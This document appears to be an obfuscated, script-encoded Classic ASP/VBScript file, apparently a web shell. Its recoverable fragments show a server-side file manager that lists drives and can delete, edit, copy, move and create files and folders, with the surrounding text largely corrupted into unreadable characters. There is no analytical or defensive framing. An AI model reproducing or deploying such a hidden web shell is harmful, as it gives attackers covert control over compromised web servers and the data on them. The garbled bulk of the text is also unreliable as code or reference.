6+4YPL~��~)���޺���@*D(@!��~[~n^YrKMO/,'~n^YkP.D/lP9nDlnMZYlGRUrtOPLP��~l��ʱ����@*D4@!��~[,+VDrPDD/,'~+sObK.YklP*+"rUR+U6tO`"b?n4KD+o,[,��~)С��@*D8@!��,[~n^Yk:.YkP',nsYbKMYd)~���~LP4YmKRx6n4YP'~��,)��·@*D(@!��,[~VDkKMYk~',+sYbK.Ok)+^Ok:DYk~hkG)*tOlK.hGnBnx}+4Ov+VOr:X\YL,xGbY1xEw)(;/,NU+=oUr4YWg~',+VbontDPD+j)b4DlKDAWh~nsbs+4Ov+sYbPHHOo,L)*tDCnM+AWh`nsbsY!RoW/6~xPVbsntO~D+j)*���S�����~4YCKM+hGKv+^l^2Dx4YmnDhKK)*tOlhDnAKn`MnhKnYb[3P(Ek)8Ed~9xn)TUk4YGH,'PnsbsntD~D+j=0bPN	+=��@*Yak.mkz@!I*`+kGV1RhK[UkSi*`[lGsD xKrYmmGscD+UnaW hK[	kAp#E�����ɶ�������B`DDsl@*BOwbD^dm\lNv'ol!LUl^PDwrD^d@!��P%)Fx/Y;8bDYO)c+skwn4Yl/^+)��@*YarD1/&@!p#cnkWV1 hKNxbAI#vNmWs+. 	WrYm^W^R.n	+wG SW[xbAp#v�����⹦���Ѽ���E`DD+^l@*vYak.mkl-CNB'Ll!oxms~YakMmd@!��~%= f'knY!4r.DYb n^ko+4O=xn4Y,F'wHP+7ljP6klb4Ylh.+SWnvnskwYM (Gd6PxPskw+4O,Y+jl*+2X:n7ljBtDlnM+SGnvDnhKnn-m?P(;/��r##@#@&@#@&wE	mOkGU,?^I	Dv0Gs9+Db@#@&+a+1;D+cktb/l	0!U`rDO?Mn],'PM	+"m?��TUrtDWgPxP6jwPO+U��LxbtOGgP'~.NsWwOk+P,Y?��o	k4OWgPxPD/rJVkwO/KPDnj��0bP9x3��0r~9x3��+!.KB+hC	+Vro9x]PL~M+[^W6P+^kwnYVnfcrjo���,��@*xm2/J@!д@*EIaw8F=+"kdRDxG0Ex+^XOd,xl2d@!��P'PMOUD	I,'PMYU.I��n/^2���~@*DxW6&@!X@*hKss+H'MWsW^~EFv'"kkPvdTxk[8hv'^m0~DxK0@!@*xm2/J@!д@*Bp62q8)+.r/ YxKWv'VHYdPUCa/@!��PL~DD?.	IPx~MYjDqn"��DCV;RDM+��	nt:P.DPW(��ED:S+slxsrs9x"P'P.n9VG0,nVbsOaK+OCD/R}jw���P��@*	la/z@!��@*EI6aFq)yrd YxKWB{+VHOdP	la/@!��Px~MYjDqnI��/s3��6qP[UA��+;D:S:C	+^ks9x"~[,DnN^WW~VkwnYV+G 6?w���P��@*xCwd&@!д@*viX2F8)n"b/OOUK0v'sHYd,xmw/@!��PL~DD?.I~x,DYU.I��+ks3���P@*Y	WWz@!a@*hGV^nX{DGsKmPvqE'nybd,BdTxbN4hEx+1lWPDxGW@!@*xm2/J@!д@*EIaw8F=+"kdRDxG0Ex+^XOd,xl2d@!��P'PMOUD	I,'PMYU.I��.lV/ MD+��	nt:PDMn~0&��+!DP~nhmxnVboN	I~',D+[sK0~+^rwYaKYlD; rUs���~@*DxGWJ@!6@*AW^V+Hx.W^W1PvFvxyr/,v/Txr[(+hvxmC0,O	WW@!@*	lwkz@!��@*Bp62F8)n"b/ODUW6B'szYkP	l2/@!��~{P.YU.I��.CVZ .M+��U+4P,D.P6q��YX+g��O/bSnVbsOdKP	rPzPt1C3PMWw���whY ��~LPbhKU`9xG^?P'~*hGxvnDEUbH,[P*hKU`MEGC,[~bSWxvzlGP[,��2h+D-��,'~+hC	+skw[x"��/.n9VWo8!? D[^WoD/KP{PDdkd+skwYdn:PYj��#M+N^GW`M+9VGsOnVR6?w~',Dn[^WsOdK~Yj��*��Y^L(r:Ykz?VrscoUrDwkM^?��vYm%8WYm+.Z .\.+U~',rjo,Y+j��nslU+^rwNU"~MY?M]~D/rSVroD/+:SDNVKoO/KBrjs~hbf��~YXnx,+h;k+D~.KD.+,UKJb*@#@&2x9Pw;x1YrW	@#@&@#@&0E	^YbWx,24wv#@#@&n6n^!Yn`k4kklUW!x`E��@*M4@!@*s.K0&@!@*E��ľnCh����B{nE^l-PDkh8!/'hl	PYbh8Ek'wzY~O!wUk@!@*/K/Wxmk'sMjhWMo	hG9'DmbtD' {+OkM.n7W[a4wcY/Ow��[4YmwOWG.L��'4YmK+4Y'��'Dwt2'��{V.j4D[[mW^wE{xKrY1b_'	WrO1lPDdWa'NK4O+sPy:.WWx:Cx,hDK0@!��%���@*D4@!@*sDG0J@!@*B��ľph?z����B'E^C\,Yr:(Edx:l	~Yb:4!dx+aXDPOE2Ub@!@*WkW'mr'^DjhGMsUhK[{Y^z+4Y[y'OkM.+7W'aa/lcO/Y-��L4OlaYKW.[��x4DlK+4O[��LYa2kl[��xsMjntD'9lG^w!'xKkD^bQ'UWbY^C,Y/K2'9WtDnhPy:MWW'nhmx~:MG0@!��L���@*.Yxn^@!@*v!yv{Y4TktP9Y@!@*DD@!@*DYUn1z@!@*Cz@!@*Y	GWz@!@*(z@!#Z�����Բ��ɾc@*4@!@*9nD{DGsKmPXxyr/,O	WW@!@*EV+9LaC'	WrY1b_v{0+M4Pm@!@*a@!@*Y	W6z@!@*2@!���������֧�����������̽@*DnY	nm@!@*.8@!@*w@!@*M4@!@*M8@!@*2@!@*M4@!@*w@!@*D(@!@*D(@!@*.Yx^z@!Piad8xLia/8x'Ia/8xL@*+sl.Wbz@!@*TZFxY4Lb+4,!Z&'4Y9rh,62/mROdY'1./,+:m.Wk@!Ppwd4U'pwd4	'ia/8ULiwd8	[@*+sCM0rJ@!@*!!8'D4ob+4PZ!fx4YNbAPa/LcOd+D'1DdPnhmDWk@!~ia/8ULiwd8	[Iwk8	[Ia/(x[@*+sCD6k&@!@*!Tq{YtTr+4P!ZfxtDNbh~w42cYd+DxmM/~nslDWr@!@*.+DUm@!��N���WK��{��WKPDd+:Pawkl��'byv`M4mL���[#FfcD4mL��ib#���nWm/UE���BD���h���]:nO&RYdn!;nIvsm\nv+DkDqRdxKwd+"��[b{2`D4^[���L#!+c.t1[���L#+vc.4m'���[*{&vD4^L��P���+dsm0���xYkn!;n"+DlNbVm-P���DwrD1/B���xol!LxmSPLCn,@$u��[b!cMt^[���OkM b*��6wdCcYd+D��c4YCawm:RM+7.+k`nVbsOaK+DC+MZRKdW���WK��{��KW~Ydn:P2/x��nYbD	 *#��wd%cYd+D��c4YCawm:RM+7.+k`nVbsOaK+DC+MZRKdW���@*Q#vWWxr24w~w42g@!@*_vKW��{��GGEPGt1n,nuhg@!��+YbDq #*��w4wcYdnD��`tDCwal:c.n\M+k`nVroD6nKOlD/ K/0��bbZ~T`D$K`O1+N4rYmnD;R.+7Dnj{W/6~Y/��YXnHP:!/nI~.KD.2,Ur��r#b@#@&2x[~6EUmDrKx@#@&@#@&rx,2M.WMP]+kEhn,1+XO@#@&0E	^OkKx,l2L[n^`b)knY,0dG{?+.-D ZMnmYn}4N+mD`rjmMk2YbxL wkVjXkY+s68LmDJb)WdKR9+^nYsrs`/n.7+.RsCawCDtvJY/D lkwaJ*#lWkWRGnVY+wrs+v/D-+. sl2wmOtvJOnkYR24aJb#=WkW G+^+Ysbs+v/nD7+. slwaCY4`JDndYcLkwE#blNJɾ�����ZJ=3x9PW;	mYrG	@#@&@#@&9b:~:F@#@&Z^lkdP`n/@#@&P~9b:PGq~G @#@&~~n!4^k^Po;	mOkKUPwW.hvs#@#@&w'smmd`o*@#@&q0,f8 +XkdYk`ob,YtU)wWDsx9Fvs*)nVdn=sGDsxJr)nU9PkW@#@&P~2	[,s;	mDkW	@#@&@#@&,PKE(Vr^,sE	^YbWx,i)`w#@#@&o's^m/n`wb@#@&qW~G Rnab/O/vo*PO4+	)/Y,ib{f+`w#ln^/+=d+DPjzxU+SPwqo)nU9Pr0@#@&P,2U[,sEU^DkGx@#@&,PKMk7lYPU;4,Zslk/m(	kYbCVby+@#@&~PGksPPfCS:?O~78ZMVWS:qxS9&2UNBPy~Pd+	~KwSBjsj~o?Dl.OBs2	[~G?Ym.O~G2	NSj2Hm:n@#@&d+DP9q{ZDnCD+64Nn1Yc}4:`cB!*b@#@&kWP"+5;/YcPWDlV~zO+k@!8POtnU,2akD~?!4@#@&k+Y~P8PxP;.lOr(L+1Yv64:`~Z#b@#@&KFcPXa+P{~qP=P:F HG[Px&,lP:F 6a+x@#@&:F MrD+~,I;E/D AbxCDHInC9`I5E/YcPGYmV~XO+db@#@&PFcKWkkOrKx'T~=PPfm~{KqcIlN,),9?Dl.Y,'~q@#@&fAUN,'PdnUAvKGlb@#@&dY~fyxZM+COr4%n1Ycr(PvcSZ#*@#@&74;.V6PxP1t.$vF&*~[,mtM$cFZ#@#@&d+O~: ~',/DlOn}4Ln^D`64:c+~T*#@#@&KUY,xPtk[AvK9CBF~,(xUYD~c9?DlMYSK9CB\8ZMs0*Oqb@#@&KJn	PxPdn	A~vKUY#@#@&GjYmDO'G?OCMY_:J+	_F@#@&AtbVPcfjOmDOP3~FZ#~@!,f2U[@#@&~PG(Ax[,',qxUYM$`G?OlMYSPGl~78ZMV0,'~\(ZMVW#Qf@#@&~P:+R:X2n,'Pq~=PP c\KNn,'2P),Ky ra+U@#@&P~P8RnKdkDkW	~xPG?Dl.Y@#@&,PPFc/WaXPG,K S9&2UN 9UYCMY@#@&P,Ky nK/rYbWU~{P!,lP: R:z2+,', ~)~PyR/tm./Y~xro4+f8 E@#@&~,K(	P{PKyR"nl9Kn6DPl~: R;sWk+@#@&~~fUYmDOPx~&xjYM$`Gq3U9~K9CBKjY*@#@&P~w?DlDDP{~q	?ODv +S:qxBExm:+{EEJBF*_@#@&~,s3x9~',qUjDD`ojDl.YBP&xSrJrJ~8#@#@&P,j21m:n~{PV1C/`Hb[~`:q	~o?OCMYSsAUN sjOmDYbb@#@&~PbW,qUUYMP`W*BPq	~E0bVnUm:+{EJr~F*~@*PZPDtnx@#@&k+OP:oS{xnA,sqo@#@&sjYm.DPx,q	?YM`w3x9~Pq	~EWbV+	C:'JrESF*_8!@#@&o3	N~',(xUY.cw?YC.D~Pq	SrJEr~8#@#@&sUOlMY~',qUjDD`w3x9~K&USJ;W	YnxOR:X2+=~JBFbQ8c@#@&oAx[P{~&xjDDvs?DlMO~:qU~74/.*@#@&:oScsk^njYmDDPxf(3	N@#@&:oScsrs?k"n,'~fUOmDO,OGq2	N,R&@#@&r0,xGO,f c36b/Ykciwgls+bPO4x@#@&,~fyRC[9Pj2Hm:n~:od@#@&x9Pk6@#@&~PVd+@#@&P+cKXanP{FP=~P cHKNnPxf,)~Ky ra+U@#@&KF KK/rYbG	Px,f&2x9P=~K8R/WaXPG,K B9?DlDDR9qAx9Of@#@&PyRKWkrYbWU~{P!~l,K+R:za+~{Py@#@&: c/tmDd+DPxET4 2q r@#@&Uo#P{P:  InC9Kn6D@#@&:  /^W/n@#@&kWPGqc2ab/D/``wgC:#~Y4+U@#@&PPGq``w1mhn#{f8`iwHCs+b[rSPr[joj@#@&nsk+@#@&,~GF zN9Pja1mh+B?o.@#@&nU9Pk6@#@&,P+	[~k6@#@&P~fjOmDO'GjYmDOQ:S+UQ8@#@&hU9@#@&:fm'Jr@#@&d+DPP ,'UGDtk	L@#@&PPAU[PUE(@#@&P~KMk-lDnPUE8~;Vldd|KnDsr	lO@#@&k0,I5E/OR:WOC^AXDn/@*!PD4nx@#@&,P9F ]:G\)V^)9+cI+hG7+)V^@#@&P~k+DPf8'	GY4kUo=/nO,f {UWDtk	L@#@&,P:F ZsGk+l/OP:F~x	WY4r	o@#@&U9Pr6@#@&PPAx9~?!4@#@&Ax[~;Vlkd@#@&@#@&;sC/kPwqo@#@&[b:~sbs+Uk"nBsksnUYCDD@#@&P~hDb\lD+,jE(P/Vm/dm&xkDrl^ky@#@&P,sbVn?r"PxPZ@#@&,Por^+?OCMYxPZ@#@&P~Ax9P?!4@#@&P,n;4^k^~6Ex1OkKxPUC-+z/vsb@#@&~,Nr:,P&@#@&~~Ul\n)k'OD!n@#@&~,k6PYMkscs*'EJ,W.~wkVjYmDY{T~Y4+	Pn6rO,0;x1OkKx@#@&,P/nO,Kf';.lOr(L+1Yv64:`~Z#b@#@&PK2 HKN+{f~),K2RPX2n{F~),P&cr2n	@#@&~P8R2WkrDkG	'wkV?DCDD@#@&P:F ^KwXDGP:&~wrs+Uk.+@#@&~P2Rjl7nKKsrsPsS+@#@&~K2 ;VGk+@#@&Pk+D~K2'UWDtrUT@#@&,jl7+bkxWl^/@#@&+U[,0;x1OkKx@#@&AxN~/^ld/@#@&;VCk/,SAw@#@&~PGkhP;s@#@&,PnMr\mY+,j;4,Z^ld/m(	kOkmsk.+@#@&U2K~/w'/DCD+6(LmYvr(P`Z~T#*@#@&~,2x9~?!4@#@&~~nMk7lO+~j!4~Z^C/k{PnM:kUCD+@#@&UnDP/w'gWY4k	L@#@&P~2	N~j!4@#@&oE	mYbGUPUtKh9Dr-Dc#@#@&sKD~3mmt~9,kUP;ocf.b\/@#@&P,%P1Na[r@!C~4D+6xBNl\md^DbwD)jtGAwWsN.`rJE'GRf.r7+J+DOD'r)'-Jr#E@*[	4dw���ش���,`E'GRfMr\S+DOnDLJ=#@!zC@*@!4.@*@!&Y9@*@!&DD@*E~@#@&H+XO@#@&~,2	NPwE	^YbWU@#@&s;U1YkKUP&/q1Gckm~b4SYCb@#@&7q6~?4WAobV+(^K'OD!n,K4x@#@&P,P,~P&/(mKPx~rP@!bho,/D1xvJLq1WKlO4LkC[rv@*,J@#@&iPP(W,k8@!@*ErPP4+	@#@&iP,(/&mGP{PE@!b:o,dD1'Br'(mKnmY4[r8LJv@*,E@#@&d~~AxN~(6@#@&dAsk+@#@&d,Pqkq1GP{PE[	4d2p@!0KUY,0l1nxBSk	o[kULkB~mKsWM'v:2&0WTZB~/b"'v+B@*J[DlLE@!J0GxD@*~~r@#@&i3x9Pq6@#@&2	N,s;x^ObWU@#@&oE	mOrKxPor^+(mKcw1Cs+*@#@&,P&WPUtGhwksn&mW{OD!+P:4nx@#@&,P~PPza+JkkOP{P~Ecl/2 m/CR(CDR8swcmWsR9GmcN8R9Vs 6+cLk6RtDh tD:^Rrx^ bxrRN2ocLd ^Wo h94 :b[c:22Raxocw42RM: DmD dS0RDaYchl7 aVkRX:sR"raR%/a lkwa pJ@#@&~,P~sbsKza+,'P^mmd+vHrNvsHCs+~,(xkYD"n-`w1m:n~E r#QF*b@#@&P~~,q0~(	/ODvPHwndkkY~rRr'sbVnKHwnb@*!PD4+	@#@&,~~P,P&mGPx~wks+:zw[E Tk0E@#@&P~P,3^/n@#@&,PP,P,(mKPxPrNnWmEVD ob0J@#@&~P,PAx[P(W@#@&@#@&,~P,srsqmG~{PE@!bhTPdMm{BJLq1GnmY4[&mG'rBP(GD9+D{vTB@*Pr@#@&P~3^/nP@#@&P,P~obV+(^K'E@!6G	Y~6l1+'EhbUo9kUokB~^KVWMxB[&&6WT!EPkk"+xv2B@* @!&0KxO@*,J@#@&~,2UN,(6@#@&Ax9Ps!x1OkKx@#@&wEU^DkW	~?4Wh8orV`hlOtb~@#@&j+D~s}S9x;sR!nDsGV9nM`KmY4#@#@&k{T@#@&?('r@!OC(V+,Ak9Yt{vq!Z]EP8W.[DxBZvP1+sskwl^r	oxBZv,mn^ValN9k	L'Evv@*@!Y.@*rP@#@&oWMP2m^4PwPbx~s6JGRdE(WW^Nn.k@#@&j({?([r@!DN~4+botD'8TPSk[Y4'q{uPl^ro	'mUO+M@*@!Nr\~dDXs+{v4KD[nM)F2a,/GVb[,J'~WMN+MZKsWM[Eial[[bxo 8WDYWsl*wXB@*J@#@&j({?([&dq1WcEr~JWG^NnDcLb0EBJZJ#@#@&kr'kk'J@!l~4M+0{vLm\lk^.kaY=?4WAoKV[+McJrJ']nlO4vnCY4'r-ELsc1ls+*'JrJbB,YrO^+'rE����Jr@*@!(.@*JLsc1C:n'r@!&l@*@!4M@*@!C,tDnW{B%l7Ckm.bwD)s!V^oWM:cJrJ']nlD4`hlY4'E-r[wRHlhn*[EJrSJrZG2HsWs[DEJ*v,PG	m^km0'E.+DE.x,XndK3`*vP1VlkdxBm:EPOkOs'v����B@*/WaX@!&m@*P@!C,t.+6xELC7lkmDbwDls!VssKDhcrJJL]+aVl1ncnmY4[E-E'wRHlsn~r-ESr--EbLJEJBErfn^sKVNDrE#EPGx1Vr^0'BMnY!Dx,zn/K3v#vP^sm/d'EC:EPOrDV+xvɾ��E@*9+^@!Jl@*,@!mPtM+6xBNl-lkm.raY)w;V^sWMhcJrJLInnCO4`KlD4[r-E'wR1Ch#'JrEBJEtW7+sKV9nDrJbB,WU^^km0xBM+Y!.UPH+kWV`bv,mslkd'Elhv,YkOs'v�ƶ�B@*\K\n@!zm@*P@!z9r\@*@!&Y9@*E@#@&k'bQF@#@&q6~rPsW9P'T~Dtnx,jq{?('r@!zO.@*@!OD@*E@#@&H6D@#@&Uq{jqLJ@!zDD@*@!DD@*@!ON,t+bL4Y{ @*@!&Y[@*@!zOD@*@!zDl8s@*J@#@&NPjq,'rJ~=PUq'rJ=r'Z@#@&?&'E@!Dl4^nPSkND4xB8!Z]vPCsboU'1nxD+.@*@!YD@*@!DN~k9xk@*@!(PbN'X@*wrVxC:@!&8@*@!zD[@*@!YN,r['kP4+ro4O{ +@*@!8PbNxa@*?k"n@!z8@*@!&DN@*@!Y9Pk9'k@*@!(PrN{6@*PHw+@!&4@*@!zD[@*@!DN,k['d@*@!4~k9x6@*r2nMlYrUT@!&4@*@!JY[@*@!DNPbN{d@*@!4~k9'a@*dl/D~HKNk6rnN@!z(@*@!zO[@*@!ON@*@!zDN@*E@#@&sG.,2Cm4~dPr	PwWV9R6rV/@#@&Uqxj&[J@!OD@*@!Y9~4+bo4YxB+TEPrN{[PKx\G!/+6-DxJrO4kdc/DXVR(Cm0o.W!x[/KVWMxB[!!+fT!EJrPGx\G!/nr!O'rJO4b/RdOHVnR(C13LMW!xN;W^GD{B:!Z&TTZBJr@*J@#@&/bxdkLsbVnq^GvS 1mh+*@#@&db'/r'r@!CP4.0xELm\lkmMrwD)oE^VoGM:`rEJLI+hCOtvnmY4[Ewr[JRgC:#'ErJ~EEGWAxwr^+Er#pBPDkDs+{B����v@*,PE'dR1mh+LJ@!JC@*@!:N,k['[@*r[^V	L`dRdr.+zqTycb[rF@!zO9@*@!KN,k9xN@*J'ScKz2[J@!&Y9@*@!:[~k9'9@*E@#@&db'dkLE@!mP4.0'EEr[GwU`DsvnmKtLJ'E[dRUbs+b'rJJ,^Vm//{vC:EPDkOVnxEr2+	v@*}wnU@!zl@*~r@#@&/bxkk'r@!mPtM+6xBNl-lkm.raY)w;V^sWMhcJrJLInnCO4`KlD4[r-E'dR1Ch#'JrEBJEANbYsbVEJ*B~m^ldd{BlsvPDkY^nxB�༭E@*ANrY@!&m@*~J@#@&?b'jrLJ@!C~Kx^Vb^0'ErhbxNKhcGwxcBQb^ObWx{3NbYnKAnDLnKhnDKCDtxJL]+abO4vnlP4LJwJLJcx)s+*[JE~E3NbYKWS+.vBBYKGV(lD{TSVKmmYrWUxZ~[kMnmDW.r/'TSkYCY!d{!Ss+	E4mD{T~km.W^V8CM/'ZSD/k.C8V'Z~Ak[O4'f!ZStkL4D' TTE#EJ,4M+W{B[aaEP1slk/xBm:v~DkY^n'EȨ��B@*Ȩ��@!&C@*r@#@&fr:~39kOr}F@#@&2[rDrrFx8@#@&29rDr6j'^RbDYMr4!Yn/@#@&(W,2NbOr}.P@*x~Fy%,K4+U@#@&2[kD6rjPx~ANkO6}.~O,qy%@#@&2	NP&0@#@&q6P3NbY66jP@*{~vWPK4nU@#@&29kOr6#,'~29rY}r#~ Pv*@#@&2UN,(6@#@&&0,2NbY}6.,@*xP2 ~P4+x@#@&29kY}6#P{PANrY66jPRP2+@#@&2U[,q0@#@&&0~29rDr6jP@*'P8v,Ptx@#@&ANrO}r.,xPANkD66.,O,F@#@&3	N~q6lq6P3[bYr6#,@*xPR~:tn	@#@&2NbY}6.,'~29kO6}.P ~%@#@&2	[~q6@#@&qWP3[bY6rj~@*{P*~:t+U@#@&2[kD6}.~{PANkDr}#P P*)ANrO}r|{T@#@&2x9~(0@#@&&0~2[rDr6.,@*', ~P4+x@#@&ANrY}6jPx,29kY}rj~O, l29kO6}|'Z@#@&AxN,(W@#@&q6P3NrO}r#P@*xP8PP4x@#@&39kOr}#,'~ANbYr}.,RP8)3NbY66n'!@#@&2	NP&W@#@&b0,2[kO6}|x!,Otx@#@&kk'drLJ@!0KUDPWmm'BS+([k	odB,/r"'B8vP1WVK.xDN@*6@!zWG	Y@*J@#@&+^/n@#@&/kxdb[E��J@#@&x[,k6@#@&kk{dkLJ~@!mP4.0'E%l7l/1.rwD)wEsVoGM:cJrE["+KCDt`KCDt'J'ELS gls+#LJrE~rJ9+^srsJJ*vP,Wx1srm0'EDnY;.	Pz+kG3v#v~1Vldd{BC:E~DkO^+{Bɾ��B@*fs@!Jl@*P@!l~4M+0{vLm\lk^.kaY=s;VsoKDh`rEJLInKmYtcKmY4[rwr[Jc1m:+*[rEJBJEZKwzobV+rE#EPm^Cd/{Bm:vPOrDVn'E����v@*;W2z@!zl@*~@!l~tMn6'vNl7l/1Db2Y=s;V^sG.s`JrE["+nmO4`hlDt'JwELS 1mh+*[EEr~JE\K\nsbsJE*B,mVm/kxBm:vPDkOs'B�ƶ�E@*HK\+@!&C@*@!zDN@*@!O[,k['9@*JLDn2^lmncdR9lDndldDHKNk6k[~rzE~rOEbLJ@!JON@*@!zD.@*J@#@&b'r_q@#@&1n6D@#@&NPj(LJ@!&OM@*@!zDC(Vn@*J=k0,q	dYM`j+M\n.!~J8+Gc!RZ qJ*@!@*!~W.~&xdYMc?D-nME~EqO  F+0cJb@!@*ZPPDtU)Vd+=kW~k+/krW	`Jkn.\mr#xF~O4+U)kn/kkGUvJ/n.7+^J*xk+dkkKx`r/.\mE#3Fl%,0E1VjMV)sd+=k6P)mOrKx@!@*rEPDtnU,/+ddbWU`rdD-mr#'k+kdkKxcJk+.-mJ*QF=+x9~r0=+	N~kWlx[PbW@#@&?nO,srJ9{1GY4r	o@#@&2	NP6E	^YbWU@#@&s;U1YkKUPG+Vwrs+vnmY4#@#@&&0~Zw sbVn3Xk/OdvnCY4b,K4x@#@&ZwRGnVYnsbVn~hlY4@#@&Uq'r@!^+	YD@*@!8.@*@!8D@*@!4M@*��ϲ���ļ�~ELnlO4LJ~ɾ���ɹ���@!J^xOD@*J@#@&?&x?&[$l13i.^@#@&N~?&@#@&AU[P&0@#@&3x[~wEUmDrW	@#@&o!xmOrKx~29rDsr^+vnlDt*@#@&&0~I;;nkY`r)mDkW	+E#{JhWdYE~:tnx@#@&?Y~P{Zs /M+CYP6Owk^+`hlD4#@#@&PRqDrOSk	nP"+;!ndYc0KDh`E^KxO+	OJ*@#@&PcmVGd@#@&?O,Kx	WDtk	o@#@&?&'E@!1+UOD@*@!8D@*@!4M@*@!4M@*��ϲ���ļ�����ɹ���@!z^+UOD@*J@#@&?&'j(LAl^V`Ds@#@&%,?(@#@&"+/aW	d+c2UN@#@&3U9Pq6@#@&&0PhCOt@!@*rJ~K4n	@#@&?OP:'/ocWwnUD+aY6r^+chlDt~,FB~smVd+*@#@&PXY'_PHd2x1G[+vKcDnl[C^VbP@#@&KcmsGk+@#@&jY~K{HKY4bxT@#@&AVkn@#@&nCY4'jnk/kKU`rsW^[nDhlDtE#'E'/4+^sRm/2E=K6OxkY.Az9@#@&3	N,q0@#@&N~J@!sGDsPC^DkW	xBr[j"J'JQb1YrWU+{nG/DvPs+O4KN'v2K/OB,Um:n{BANkDsK.:E@*@!k	w;O,xlsn'EbmDrGxEP7lsEnxE2[kDok^+v~:XwnxEtrN9n	B@*@!k	wEDP	C:'vsglhnEP\msE'Br'KlDtLJvPdOHVn'EAk9Y4l8!!Yv@*@!8D@*@!D+aDlM+l,xmh+{B/W	YnUDBPkOX^+'EArNDt=FT!YI4+ro4O)W*Tv@*J[PaD[E@!JO6OmDl@*@!4M@*@!4D@*@!bx2;DPxmh+{BoK8Cm0B,YzwnxE4;YDGxEP-C^E+xv~l^3E~Kx^^k13'EtbdYKDzR(l^Vv#iE@*[	4/aI'x(/ai'x8dai@!k	2EDPUCs+'v./nYE~DX2'ED+k+DvP7lsE'v]/+Dv@*Lx4k2I[	4kwI[U8kwI@!bUw!Y~Um:+xvkE8:bOEPOHw'BkE(hkDB~\mV;n{B?m-+E@*@!JWGDs@*r@#@&2U[,s;x1OkKx@#@&wEx^ObWUP;GaXobV`nmY4b@#@&nCY4'j2^kYvKlDt~rkku-J*@#@&qW~;s sbs+A6rdD/`KCDtc!*b,lU9PhlY4`8b@!@*JEP:tnU@#@&Zw ZKwXwrs+,nmY4`TbBnCY4cF*@#@&j&'J@!^xO+M@*@!4.@*@!(D@*@!4M@*��ϲ���ļ�JLnCY4`TbLJ���Ƴɹ���@!J^+	Y+M@*E@#@&?&'jq'$mmVjMs@#@&L~j&P@#@&3	N~q6@#@&2U9PwEx1YbGx@#@&oE	mOrKxPtG\sk^ncnmY4#@#@&KCDtx?askD`KCDt~Ek-ukJ*@#@&qW,ZwRsbV36b/O/vnCO4`!*bPmxN,KCY4`8#@!@*EE,K4+	@#@&;s \K\+or^+~nmO4`T*~hlY4`8b@#@&?('r@!^n	Y+M@*@!(D@*@!8.@*@!4M@*��ϲ���ļ�E[KCDtc!*'J�ƶ��ɹ���@!z^n	Y+.@*r@#@&?&xUq'~l13jMV@#@&L,?(P@#@&3U9Pq6@#@&AxN,o;x1YbWU@#@&o!x^YbGx,fnswWV[nM`KlD4*@#@&&0,ZscsKsND36b/OdvnlD4#,KtU@#@&;scfnVnOsGV9nD,nCO4@#@&j({J@!mUD+.@*@!(D@*@!4M@*@!(D@*��ϲ��Ŀ¼JLnCO4[Jɾ���ɹ���@!&mxY.@*J@#@&Uqx?('~l^3`.V@#@&%~Uq@#@&3	N~q6@#@&2U9PwEx1YbGx@#@&oE	mOrKxP;GwHsW^[nDvnmY4#@#@&hlOt{jw^kOchlY4Sruku-E*@#@&&0,ZscsKsND36b/OdvnlD4`Z##,CUN,nmY4`qb@!@*EJ,Ptx@#@&;sR/GaXoW^[D~hlDt`Z#BKlDtcF*@#@&j&'J@!^+	Y+M@*@!4M@*@!4.@*@!8M@*��ϲ��Ŀ¼E[hCY4`TbLJ���Ƴɹ���@!&^xO+M@*r@#@&Uq{?qLAm^3`Ds@#@&L~j&@#@&AUN,q0@#@&3x9PwEUmOrKx@#@&w;x1YrG	PHG-sGV9nM`KmY4#@#@&nmOt{?2VbYcKmYtBEu-uurb@#@&&0,ZoRoG^NnDAakkYdchlY4cZ#bPmU9PKmY4`F*@!@*EJ,K4+	@#@&/wRHK-+wWV9n.PhlDtc!bShlOtvq#@#@&j({J@!^n	YnD@*@!(D@*@!4M@*@!(D@*��ϲ��Ŀ¼E[hlOtv!b'r�ƶ��ɹ���@!z1nxD+D@*E@#@&Uq{?([$C13iD^@#@&NPj(@#@&2U[,qW@#@&3	N~wE	mYbW	@#@&wEUmDkGU,1+SoW^N+McKlDt*@#@&+an1EO+vdtb/CU6ExcE6q~N	3��&?~N��VMj31l~'qU'(?���@*DnO	+mJ@!�����ɽ��©�[4Ylh'��¼Ŀ��ϲ��@*D(@!@*D8@!@*.(@!@*DOxm@!��x&?��tOChP.+9sKsnDlDZcs;��U+4K~���@*@!tOChPN	CP*tYmKc/D/b63Dn[^WoRw/PDWH~6qJbb@#@&3x9~wEU1YbWx@#@&AUN,Zslk/@#@&@#@&+Xnm!Y+vd4kkl	0;xcE(EjP9U2��6k~[	2�������+.n4hzxz^a���ý��Ʋ�����¼Ŀ��Ĭ���Կ�~��������nM+4hX	b12{�ַ�@*ks@!��N��xn4:P#��6rmc��[+sCUD\M+d[��w^YUlsz?'lOCGPxGrDl^k^2abwkD/j,V^)-koUkDYnj,Nxz~/Dx+s;^WG-��LDn\r.9/z/vdYkka3Vko K/WP6(��*��+hm1M+Y!wsGZ'+hlgDnO!w:K/-:lg.nY!wsW/-sGMYUW;wY?sGMYxG/DxnDM;;-\AKU5?'HdFC��vNC+"on]ct/Sx+slxMn-D/��* S#+cM+[VKoVmk^na/Yn!cWdsvO6+s{+7kD9/Hj��#��DmnL(rhnD/XUnVbsRTUrYakMmj��`O^L8WOlD/ M+\.nU'G/6~D+j��D61��0bP9U2��6k~N	2���@*.(@!��ľn_K��д�Ҳ�~¼Ŀ^klt8n�Ҳ��Կ�B������Ȩ:YdXjsmmGS����Bskm:UrqPmrLmHm���������@*bs@!��L��Ut:P��:Ykz?^l^Wd��'nhm1Y	;W1mb^r\M+URnmr-M+jL(GP6k��Un4KPb��sblhxbA��B#nslgR+1k7.+UL8Wv+dC1V`MO/	kP6r��Wk,N	2��Wk~[	2���@*D(@!Ȩ����ľwk9��ʹ�ǿ��Կ�S������ȨhY/zj^l^Wd����SDl^sW:{���������@*bV@!��%��xtPP��s+OdH?Vm^Wd��'+sCHY	EKm^bn^b\.+U +1k-.?L8G,0r��x4:Pb��Dl1:WD��~*n:m1 +1k-.?L(G`/l1scDD/	k~0r��WbP[xA��Wk,NUn��6kP[UA���@*.4@!��ľK_n�ǿ��Կ�Ss+D/XUVm^WdΪ��Ȩ����~�ڴ����nt1l2)|���������@*k^@!P��N��+/^3���@*D(@!Ȩ���ֱ�Կ�c+4mC2zΪ�����A3ǰ��@*rV@!��L��Un4KPb��n4mCwz��S*��2]z:srU{"3."2j��`k+s8mkDm#D\Dj Yk+!;nIc.D/Uk,Wq��	+4P,��:+OdH?sl1Gd��'nslgYx!W1^bmr\M+j mk7.+UL4K~Wk��	+4K~��+4^mwC��'*n:m1 